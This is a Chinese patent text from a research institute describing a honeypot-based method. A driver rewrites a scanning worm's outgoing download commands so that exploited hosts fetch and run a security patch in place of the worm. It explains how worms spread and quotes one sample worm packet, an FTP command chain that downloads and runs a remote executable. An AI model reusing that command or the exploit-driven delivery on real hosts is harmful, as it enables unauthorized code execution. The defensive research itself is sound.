专利名称:一种补丁分发方法
技术领域:
本发明涉及网络安全技术领域,具体地说,本发明涉及一种补丁分发方法。
背景技术:
当前,计算机与互联网已经广泛深入到人们日常生活中,成为人们经常使用的工 具,而现在的绝大多数个人计算机所用的操作系统和应用软件都包含系统漏洞或软件漏 洞。所谓系统漏洞,是操作系统自身的漏洞,这些漏洞在安装了操作系统后或者安装了系统 补丁后都可能存在或新产生;所谓软件漏洞,是用户在操作系统上安装软件后引入的漏洞, 比如中国常用的聊天软件QQ、MSN,邮件软件FoxmaiLOutlook Express,媒体播放软件暴风 影音、千千静听等,都存在可被恶意代码利用的软件漏洞,其中有些漏洞已经被大规模利用 实施恶意攻击。近年来,对操作系统漏洞的利用数量比较平 稳,而对软件漏洞的利用则呈递增趋 势。特别是对浏览器软件(如微软的IE7)漏洞的利用,更是广泛存在。例如,网站挂马就 是利用了浏览器漏洞,或者浏览器嵌入 的软件(如媒体播放器)漏洞而入侵用户计算机系 统的攻击行为。消除漏洞的根本办法就是安装软件补丁。如何有效地分发补丁,是众多网络安全 管理人员所面临的一个重要任务。以微软(Windows操作系统生产商)为例,其各种系统安 全补丁几乎每周都会出现,而具有大面积客户端的网络靠手工进行补丁升级是不现实的, 一般的用户本身也不具有为系统打补丁的意识,很多用户本身也不知道需要安装哪些补 丁,甚至更有部分用户无法独立安装操作系统补丁,这些都已经造成网络中的客户端出现 安全漏洞,成为安全隐患。鉴于补丁分发存在难度,微软推出了 SUS、WSUS和SMS等补丁分 发工具,这些工具提供了相对牢固的补丁和更新支持,但是存在一个致命性的弱点一旦补 丁分发客户端程序被恶意代码关闭,则失去了自动下载补丁的功能。综上所述,计算机系统受到网络攻击的重要原因是存在漏洞,如果能够为用户系 统及时地打上新补丁,则会有效降低被攻击成功的概率。在最短的时间内安装补丁将会极 大地保护网络和其所承载的机密,同时也可以使更少的用户免受蠕虫的侵袭。对于机器众 多的用户,繁杂的手工补丁安装已经不能适应大规模网络的管理,而SUS、WSUS和SMS等补 丁分发工具本身易于成为恶意代码的攻击目标,因此它们并不能确保计算机系统的安全。 因此,当前还迫切需要依靠新的技术手段来实现对操作系统的漏洞自动修补方案,以作为 对现有补丁分发工具的补充,及时为更多的计算机系统打上相应的补丁。
发明内容
本发明的目的是提供一种具有全新机制的补丁分发方案,以作为对现有补丁分发 工具的补充,及时为更多的存在漏洞的计算机系统打上相应的补丁。为实现上述发明目的,本发明提供了一种补丁分发方法,包括下列步骤1)蜜罐机被扫描性蠕虫感染;
2)蜜罐机作为攻击源攻击其它计算机系统;3)用补丁程序替换用于攻击活动的恶意代码;4)将补丁程序投递到远程受攻击计算机系统。其中,所述步骤2)还包括蜜罐机作为攻击源随机向远程主机发送攻击报文,远 程主机执行攻击报文的代码,打开命令通道。其中,所述步骤3)还包括拦截并检测蜜罐机发送出去的报文,当报文中包含恶 意代码时,用相应补丁程序替换所述恶意代码。其中,所述步骤3)还包括蜜罐机上的驱动程序拦截并检测蜜罐机发送出去的所 有报文,当发现从蜜罐机发出的报文中含有“下载蠕虫文件命令”时,将“下载蠕虫文件命 令”替换为“下载补丁文件命令”。其中,所述步骤4)还包括蜜罐机以所述扫描性蠕虫的攻击机制将所述补丁程序 复制到受攻击计算机系统,并使受攻击计算机系统运行所述补丁程序。其中,所述步骤4)包括下列子步骤41)蜜罐机向远程主机打开的命令通道发送替换后的攻击报文;42)远程主机收到替换后的攻击报文后,从蜜罐机下载并运行补丁。其中,所述蜜罐机安装有防火墙软件并设置防火墙规则以拦截蜜罐机发往非授权 IP地址段的报文。其中,所述蜜罐机上拷贝一个或多个重要漏洞的补丁安装文件。其中,所述步骤4)中,所述蜜罐机为所述远程受攻击计算机系统提供补丁安装文 件下载服务。其中,所述蜜罐机为所述远程受攻击计算机系统提供FTP、TFTP或HTTP下载服务。与现有技术相比,本发明提供了一种利用扫描性蠕虫的传播机制进行补丁分发的 方案,能够准确的进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系 统安装补丁,同时不会给网络引入新的攻击流量。同时,本发明是一种与现有补丁分发工具 相比具有不同机制的补丁分发方案,能够作为对现有补丁分发工具的补充,及时为更多的 计算机系统打上相应的补丁。
图1示出了扫描性蠕虫的传播流程示意图;图2示出了本发明一个实施例的补丁分发流程示意图。
具体实施例方式以下,结合附图和实施例本发明做进一步的详细说明。根据本发明的一个实施例,提供了一种利用蜜罐技术的补丁分发方法,该方法通 过替换蜜罐向外发出的攻击报文内容,将有害的恶意代码投递替换为有益的与漏洞相关的 补丁投递,并在远程主机上运行,从而实现了有针对性的补丁分发。通过这种方法,可以及 时为存在漏洞的主机打上补丁,又不会为网络引入新的攻击流量。扫描性蠕虫是攻击漏洞的典型恶意代码,本实施例需要利用扫描性蠕虫的攻击机 制进行补丁投递。主流扫描性蠕虫的传播步骤如图1所示。
步骤一攻击源主机上的蠕虫随机生成一个待攻击的目标IP地址A,向A发送攻 击报文(ShellCOdel),A上包含漏洞的程序收到攻击报文后,会执行Shellcodel代码,打开 命令通道,等待执行攻击源发来的后续命令;步骤二 蠕虫向A打开的命令通道发送命令,使A从蜜罐机下载蠕虫并运行;步骤三A上含漏洞的程序试图从攻击源下载蠕虫并执行,蠕虫打开的Ftp/Tftp 服务程序为A提供下载;步骤四蠕虫打开的Ftp/Tftp服务并将自身复制到A,A运行蠕虫,成为新的攻击源。下面对本实施例做更加详细的描述。依据本实施例构建的补丁分发系统包括两部分,第一部分是蜜罐机,第二部分是 驱动程序,所述驱动程序可以安装在所述蜜罐机上。下面分别描述本实施例的蜜罐机和驱 动程序。1.用于捕获恶意代码的蜜罐机H蜜罐是一种安全资源,它是网络安全人员主动设置的一种特殊的存在漏洞的主 机,其作用在于被扫描、攻击和攻陷,并通过对所有流入/流出蜜罐的网络流量的监视和分 析,达到对网络攻击活动进行监视、检测和分析的目的。蜜罐一般可分为被动蜜罐和主动蜜 罐,被动蜜罐被动等待被攻击,主动蜜罐主动对外访问危险资源。本实施例采用的是被动蜜 罐,该蜜罐被动等待被扫描性蠕虫攻击。本实施例的蜜罐机可采用Windows或Linux系统,它们原理类似。下面将以 Windows系统为例说明构造蜜罐机H的方法。该蜜罐机需要安装好操作系统、接入互联网、 设置公网IP地址、配置防火墙、安装一个或多个常用软件、运行蜜罐程序(蜜罐机上运行 的、用于模拟漏洞与攻击源交互的程序,该程序让远程攻击源认为本系统存在漏洞且可以 攻击成功),然后等待被扫描性蠕虫攻击。本实施例中,可按下列步骤准备蜜罐机。步骤一准备一台安装Windows XP的主机作为蜜罐机;步骤二 在安装好操作系统的蜜罐机上安装一个或多个常用的应用软件,如IIS、 MySQL、MSN 等;步骤三在蜜罐机上安装防火墙软件,设置防火墙规则,拦截蜜罐机发往非授权 IP地址段的报文;本步骤目的是提供一种灵活的管理策略,使管理员可以禁止蜜罐机扫描 某些主机。蜜罐机扫描非本网主机是非法的,但蜜罐机可以扫描本单位特定网段的主机。步骤四在蜜罐机上安装和使用漏洞检测软件(如360安全卫士)确认蜜罐机存 在多个系统漏洞和应用软件漏洞;步骤五从蜜罐机以外的其他联网主机上访问蜜罐机,确认其网络连接正常;步骤六在蜜罐机上拷贝一个或多个重要漏洞的补丁安装文件(可执行文件格 式);步骤七在蜜罐机上安装驱动程序D(驱动程序D的详细内容将在下文中描述,因 此这里不作赘述),用于修改有害报文内容;步骤八在蜜罐机上安装Ftp/Tftp服务软件,将补丁放在根目录供下载。2.用于修改有害报文内容的驱动程序D
驱动程序D运行在蜜罐机H上,具有系统级别的权限。D采用拦截并转发报文的方 式监控从蜜罐机H发出的所有IPv4报文。需要说明,拦截转发报文不同于旁路监听报文, 前者可以修改报文内容,而后者只能观察报文内容。当D发现了 H发出的报文C中包含了 可疑的从蜜罐机H下载文件的通信内容(即恶意代码投递命令,如get worm, exe),,就将该 内容替换(如替换为get patch.exe),使得远程主机从H下载的文件并不是原有的可疑恶 意代码M(如worm, exe),而是特定的补丁程序P (如patch, exe),补丁程序P利用报文C的 原有机制运行被投递到远程主机。驱动程序D可按下列步骤编写。步骤一编写网络流量过滤驱动程序,截获流经蜜罐机上所有IPv4报文;步骤二 编写监控蜜罐机H的驱动程序。对于每个流出蜜罐机的报文,如果包含 ftp-n-s或者tftp. exe-i,则将get、rundll32或可执行文件名(如worm, exe)替换为补丁 程序P的文件名(如patch, exe)。例如从蜜罐机发往存在漏洞的目标机V的报文内容如 下echo open IP Port > χ&echo user 11 >> χ&echo get worm, exe >> χ&echo bye >> χ&ftp. exe-n-s: χ&worm. exe&exit\r\n则驱动程序D将其中worm, exe替换为patch, exe,从而使得V连接到蜜罐机并下 载patch, exe并运行。需要说明,报文内容的变化形式很多,但一般会在ftp-n-s和tftp. exe-i中选择其中一个。当然,某些情况下,也存在利用HTTP服务下载蠕虫的情况,其原理 与FTP和TFTP相同,只需对驱动程序的相应代码做适当调整即可,这里不再赘述。而是否存在rundll32取决于蠕虫文件格式,如果是exe格式则不需要rundll32, 如果是dll格式则需要,在替换报文内容时需要逐一分情况判断,这是本领域技术人员所 公知的知识,这里不作赘述。图2示出了本实施例中进行补丁分发的流程示意图,该补丁分发方法基于上述补 丁分发系统实现,具体包括下列步骤步骤一蜜罐机H被扫描型蠕虫攻陷后,转变为攻击源。作为攻击源,蜜罐机H随 机生成一个待攻击的目标IP地址A,向A发送攻击报文(Shellcodel),地址A的远程主机 V上包含漏洞的程序收到攻击报文后,会执行Shellcodel代码,打开命令通道;步骤二 蜜罐机上的驱动程序D发现从蜜罐机H发出的报文中含有“下载蠕虫文 件命令”时,将“下载蠕虫文件命令”替换为“下载补丁文件命令(ShellCOde2)”;步骤三蜜罐机向远程主机V打开的命令通道发送命令,使远程主机V从蜜罐机下 载补丁并运行;步骤四远程主机V上含漏洞的程序从蜜罐机下载补丁,蜜罐机一直打开的Ftp/ Tftp服务程序为远程主机V提供下载;步骤五远程主机V运行补丁。
本实施例的补丁分发工具可以为在一个管理域的网络提供一种内部使用的补丁 自动分发方法。相对于现有技术,本实施例只需在网络内布置一台蜜罐机,便可以向多台其 他主机投递补丁 ;此时,对于一个网络内的计算机系统,即使用户关闭了自动更新机制(或 者被恶意代码关闭),也未安装任何补丁分发客户端,该计算机系统仍然有机会获得补丁。本实施例针对扫描性蠕虫的传播原理,利用扫描性蠕虫的传播机制,能够准确的 进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系统安装补丁,同时 不会给网络引入新的攻击流量。最后所应说明的是,以上实施例仅用以说明本发明的技术方案而非限制。尽管参照实施例对本发明进行了详细说明,本领域的普通技术人员应当理解,对本发明的技术方 案进行修改或者等同替换,都不脱离本发明技术方案的精神和范围,其均应涵盖在本发明 的权利要求范围当中。
权利要求
一种补丁分发方法,包括下列步骤1)蜜罐机被扫描性蠕虫感染;2)蜜罐机作为攻击源攻击其它计算机系统;3)用补丁程序替换用于攻击活动的恶意代码;4)将补丁程序投递到远程受攻击计算机系统。
2.根据权利要求1所述的补丁分发方法,其特征在于,所述步骤2)还包括蜜罐机作 为攻击源随机向远程主机发送攻击报文,远程主机执行攻击报文的代码,打开命令通道。
3.根据权利要求1所述补丁分发方法,其特征在于,所述步骤3)还包括拦截并检测 蜜罐机发送出去的报文,当报文中包含恶意代码时,用相应补丁程序替换所述恶意代码。
4.根据权利要求3所述的补丁分发方法,其特征在于,所述步骤3)还包括蜜罐机上 的驱动程序拦截并检测蜜罐机发送出去的所有报文,当发现从蜜罐机发出的报文中含有 “下载蠕虫文件命令”时,将“下载蠕虫文件命令”替换为“下载补丁文件命令”。
5.根据权利要求2所述的补丁分发方法,其特征在于,所述步骤4)还包括蜜罐机以 所述扫描性蠕虫的攻击机制将所述补丁程序复制到受攻击计算机系统,并使受攻击计算机 系统运行所述补丁程序。
6.根据权利要求5所述的补丁分发方法,其特征在于,所述步骤4)包括下列子步骤41)蜜罐机向远程主机打开的命令通道发送替换后的攻击报文;42)远程主机收到替换后的攻击报文后,从蜜罐机下载并运行补丁。
7.根据权利要求1所述的补丁分发方法,其特征在于,所述蜜罐机安装有防火墙软件 并设置防火墙规则以拦截蜜罐机发往非授权IP地址段的报文。
8.根据权利要求1所述的补丁分发方法,其特征在于,所述蜜罐机上拷贝一个或多个 重要漏洞的补丁安装文件。
9.根据权利要求8所述的补丁分发方法,其特征在于,所述步骤4)中,所述蜜罐机为所 述远程受攻击计算机系统提供补丁安装文件下载服务。
10.根据权利要求9所述的补丁分发方法,其特征在于,所述蜜罐机为所述远程受攻击 计算机系统提供FTP、TFTP或HTTP下载服务。
全文摘要
本发明提供一种补丁分发方法,包括下列步骤1蜜罐机被扫描性蠕虫感染;当蜜罐机作为攻击源攻击其它计算机系统时,用补丁程序替换用于攻击活动的恶意代码,并将补丁程序投递到远程受攻击计算机系统。与现有技术相比,本发明提供了一种利用扫描性蠕虫的传播机制进行补丁分发的方案,能够准确的进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系统安装补丁,同时不会给网络引入新的攻击流量。同时,本发明是一种与现有补丁分发工具相比具有不同机制的补丁分发方案,能够作为对现有补丁分发工具的补充,及时为更多的计算机系统打上相应的补丁。
文档编号H04L29/06GK101800754SQ20101013316
公开日2010年8月11日 申请日期2010年3月25日 优先权日2010年3月25日
发明者崔翔, 时金桥, 郝志宇, 郭莉 申请人:中国科学院计算技术研究所